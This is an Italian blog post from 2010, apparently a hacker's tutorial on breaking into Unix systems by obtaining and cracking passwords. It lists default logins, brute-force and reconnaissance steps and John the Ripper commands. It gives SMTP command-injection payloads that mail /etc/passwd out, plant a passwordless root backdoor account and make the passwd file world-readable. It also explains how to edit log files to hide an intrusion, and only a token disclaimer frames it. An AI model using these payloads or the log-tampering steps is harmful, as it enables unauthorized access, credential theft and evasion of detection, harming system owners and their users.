Come Scovare le Password

Pubblicato: 22 dicembre 2010 in Senza Categoria

LE INFORMAZIONI CONTENUTE IN QUESTO DOCUMENTO SONO SOLO A SCOPO ILLUSTRATIVO, IO COMAGEN3 NON MI ASSUMO NESSUNA RESPONSABILITà PER USO ILLECITO DI QUESTE.
OTTENERE UNA PASSWORD
By ”-Comagen3”
Allora,ciao a tutti!!!!!In questa guida scopriremo come ottenere delle password per entrare in un sistema,come decriptarle e tante altre cose………
Iniziamo con l’ occorrente:
Programmi:Brutus o UnsecureJohn the ripperNetInfo
Requisiti:Saper usare il DOS ( john the ripper funziona solo sotto sto sistema )Sapere qualcosa dell’ hackingAvere un po’ di pazienza e voglia di fondersi il cervello
Io ho scritto questa guida per coloro che hanno già letto qualche guida all’ hacking e che vogliono approfondire l’ argomento delle password (come scoprirle,decriptarle…..) e non per quelli che l’ hacking non sanno nemmeno cosa sia.Ho scritto questa guida perchè in molte guide all’ hacking non è scritto come decriptare le password,anche se è importantissimo.Innanzi tutto procuratevi i programmi sopra citati perchè sono indispensabili per ottenere delle password.Poi studiate bene l’ hacking e adesso passiamo ad otttenere una passgiusta per il sistema.
Come saprete già ci sono 3  metodi per entrare in un sistema:
-Default Login-Password List-Backdoors
Il primo metodo consiste nell’ inserire,durante la procedura di login, le password e i login più comuni.Alcune volte sto metodo funziona per la scarsa intelligenza dei sysop,che non cambiano i login e le passworddi default.Altre volte non funziona.Cmq vi do le pass di default:
LOGIN                        PASSWORD
root root, system, sysop, nomesistema, nomepersona                          quando il root è fingerato (  il finger è uno strumento per prendere                                 informazioni su qualcosa collegato ad internet ), none, provare anche le password                            della lista sotto. Molto importante!sys sys, system, manager, nomedelsistema, vedi rootdaemon daemon, background, noneuucp uucp, vedi guesttty ttytest testunix unix, testbin bin, system, vedi rootadm adm, admin, sys, vedi rootadmin adm, adminsysman sysman, sys, systemsysadmin sysadmin, sys, system, admin, admwho who, nonelearn learnuuhost uuhostguest guest, user, anonymous, visitor, bbs, nome del                         sistema o dell’organizzazione.host hostnuucp nuucp, vedi uucprje rje, none, vedi rootgames games, playersysop sysopdemo demo, nomedelsistema, nonevisitor vedi guestanonymous vedi guestanon vedi guestuser vedi guestnomedelsistema vedi gueststudent student, vedi guestftp ftp, ftpuser, vedi guestftpuser vedi ftpxxcp xenixsystem managernobody nobody, nonefield servicearchie archie, noneqarchie qarchie, nonewhois whois, nonebbs nomedelsistema, bbs, waffle, noneservices nomedelsistema, services, noneinfo nomedelsistema, info, nonenew nomedelsistema, new, nonenewuser nomedelsistema, newuser, noneingres none, ingres, nomedelsistemadate date, nonelpq lpq, nonetime time, noneweather weather, forecast, noneforcast vedi weatherhelp help, nonetest nomedelsistema, test, nonewaffle vedi bbstrouble trouble, vedi rootlp lp, printer, print, vedi rootunmountsys unmountsys, unmount, vedi rootsetup setup, vedi rootmakefsys makefsys, vedi rootsysadm sysadm, sys, system, vedi sys-adm-rootpowerdown powerdown, vedi rootmountfsys mountfsys, vedi rootcheckfsys checkfsys, vedi root

Il secondo metodo consiste nello sferrare un attacco brute force: prendete un programma tipo Unsecure o Brutus,prendete un login che avete ricavato e attraverso una password list cercate di scoprire la password corrispondente tramite la tecnica brute force.Il terzo metodo consiste nello scoprire una password per il sistema attraverso lunghe ricerche sul programmatore del sistema. Bisogna apprendere du tutto sulla sua vita,i suoi hobby e tanto altro. Comunque se si cerca bene si riuscirà a scoprire una qualche password per entrare.
Un altro metodo consiste nel fingerare ( tramite Telnet:aprite il prompt di dos e digitate “telnet finger http://www.serverdahackerare.com ) . Inoltre per cercare ancora più info sul server si può aprire il prompt di DOS e digitare “telnet whois http://www.serverdahackerare.com”.  Se siete fortunati grazie a questi metodi potete addirittura riscire a leggere il file passwd. Durante il whois e il finger vi ricordo che verrete loggati.Mi hanno detto che se usate un server proxy attivo ( se ne trovano con una ricerca sul Web ) potete navigare in modo anonimo. Come configurare un server proxy: nella barra di explorer andate in strumenti: opzioni internet->connessioni adesso selezionate la connessione che usate e andate su impostaioni, digitate l’ IP del server proxy che volete usare e la sua porta. a questo punto dovreste navigare anonimi e potete guardare il passwd in questo modo : digitate nella barra URL:http://www.serverdahackerare.com/ftp/etc/passwdoppureftp://ftp.serverdahackerare.com/etc/passwdSu questa tecnica non sono sicuro del fatto che non verrete loggati,anche se in teoria dovrebbe essere così………Comunque se dovete usarla fatelo da qualche Internet cafè.Se dovete usare i proxy scaricate il prog MultiProxy da http://www.multiproxy.org . Avviatelo e andate a options->menu->proxy server list->file->import proxy list . In questo modo avete importato un lista di server proxy ( le trovate su multiproxy.org ). Poi sempre sulla stessa schermata andate su menu->proxy list-> test all proxyes .A questo punto il programma testa i proxy nella lista e evidenzia quelli attivi con un pallino verde, e potete quindi utilizzarli.
Vi ricordo che una volta scoperti dei login dovete cercare ulteriori informazioni su di essi tramite NetInfo.
Una volta scoperta una password utilizzatela per ottenere la password del root ( se avete avuto culo potreste averla già ottenuta ) .Per fare questo bisogna scaricare il file /etc/passwd ( oppure potete guardare via porta 23 il passwd file e fare 1 copia&incolla ) . Aprite ftp e digitate login e password ottenute, a questo punto andate nella directrory /etc e scrivete “get passwd C:\ “. A questo punto dovreste avere scaricato in C:\ il file passwd ( vi ricordo che queste operazioni vengono registrarte dai file log,quindi attenti ) . Attraverso il prompt di DOS utilizzate john the ripper per decriptare il passwd file.Anche john the ripper per decriptare le password usa una password list quindi se non riuscite ad ottenere la pass del root provate ad usare un altra lista ( se ne trovano con un po’ di ricerca sul Web ) . Per usare il john dovete digitare questo.
C:\john-16\run>john C:\passwdDecripta il passwd file con la passw list di john the ripper
C:\john-16\run>john -w:C:\passwdlist.txt C:\passwdDecripta il passwd file con una passwd list che gli indichiamo noi ( nel nostro caso C:\passwdlist.txt ) .
C:\john-16\run>john -show C:\passwdDecripta il passwd file e mostra le password che è riuscito a decriptare.
C:\john-16\run>john -user:root -show C:\passwdDecripta la password di un utente che gli indichiamo ( nel nostro caso era il root ) e ve la fa vedere.
C.\john-16\run>john -i C:\passwdVi da delle possibili password ricavate dal passwd file ( da usare solo in casi disperati ) .
Naturalmente non vi spiego tutti i comandi del john ma solo quelli fondamentali,perchè c’è un intero manuale sull’argomento ( nella directory doc del john ). Io stesso ho imparato ad usarlo leggendo gli esempi proposti dal manuale.
Se non riuscite ad ottenere nessuna pass x il sistema 8 neanche quella di un user regolare ) potete mandare una fakemail ( dovreste saperlo fare ) . In queste fakemail inseriremo diciture che fanno incasinare il sistema e permettono di “toccare” informazioni riservate ( naturalmente bisogna che il server da attaccare sia vulnerabile a questi bug ) . Se ad esempio vogliamo ricevere il file passwd via e-mail possiamo scrivere una fakemail del tipo:
HELO hacker.comMAIL FROM:<“|/bin/mail indirizzomittentefile@mail.net < /etc/passwd”>RCPT TO:<“indirizzodestinatariofile@mail.net”>DATAquesta e` una prova….QUIT
Oppure x manipolare un po’ il passwd file possiamo scrivere:
HELO hackers.comMAIL FROM: |/usr/ucb/tail|/usr/bin/shRCPT TO: provaDATAFrom: tuonome@tuamail.netReturn-Receipt-To: |nessuno#!/bin/shCOMANDI.QUIT Al posto di “COMANDI” dobbiamo inserire appunto dei comandi ( ovvio ) .Ecco i comandi che possiamo inserire:
/bin/mail tuonome@tuamail.net < /etc/passwdX ricevere il pass via e-mail
echo Shade::0::/usr/local:/bin/bash >> /etc/passwdX inserire una backdoor con login Shade,accesso root e nessuna password nel passwd file ( potete cambiare login , UID, directory e shell ) .
chmod 777 /etc/passwdX rendere il passwd file prelevabile da chiunque.
Naturalmente ci sono altri bug x prelevare il passwd ma qui ho inseritosolo quelli ke conosco.se poi non volete sfruttare queti bug collegandovi alla porta 25 potete usare l’ ftp bounce ( trovate vari tutorial su di esso in rete ) .
Una volta ottenuta la password del root possiamo entrare nel sistema per hackerarlo. Vi ricordo che dopo ogni hackeraggio dovete toglierli dai file log ( spero sappiate cosa sono ) . I log vanno editati ma non cancellati. Ecco come editarli:
I file  log + importanti sono:
/etc/log            ( di default )/tmp/log            oppure  /temp/var/log/var/run/var/log/usr/log            oppure   /usr/adm/log/usr/adm/sulog      oppure /usr/adm/su_log/usr/adm/loginlog   oppure   /usr/adm/acct/loginlog/usr/adm/errlog/usr/adm/culog/sbin
Comunque  quando entrate in una directory in cui sono contenuti i log fatevi dare dal server la lista dei file presenti ( per farlo digitate ls-al ).Prima ho detto che questi file vanno modificati, non cancellati. Ma come fare per modificarli ?Poniamo l’ esempio che debba cancellare il file log /var/log. Dovrò digitare i seguenti comandi:
$pwdCurrent directory is /etc$cd /  ( oppure cd ..  )$cd  var$vi log
A questo punto guardo il file log e cerco le informazioni che esso contiene su di me ,per poi cancellarle.Potete anche cancellare tutte le lettere eccetto 2 o 3 di cui è composto il log, in modo da cancellarlo quasi del tutto e da lasciarlo senza nessuna informazione su di voi. L’ esempio di prima era solo  per far capire come editare un  file log. Se avete ancora problemi scrivetemi,e se siete in difficoltà non trascurate di farlo perché editare bene i log è importantissimo.

Un bel fuck a tutti i lamer e ai cracker e a quei cretini che usano Internet x intraprendere traffici illegali di bambini.

Annunci

Rispondi

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...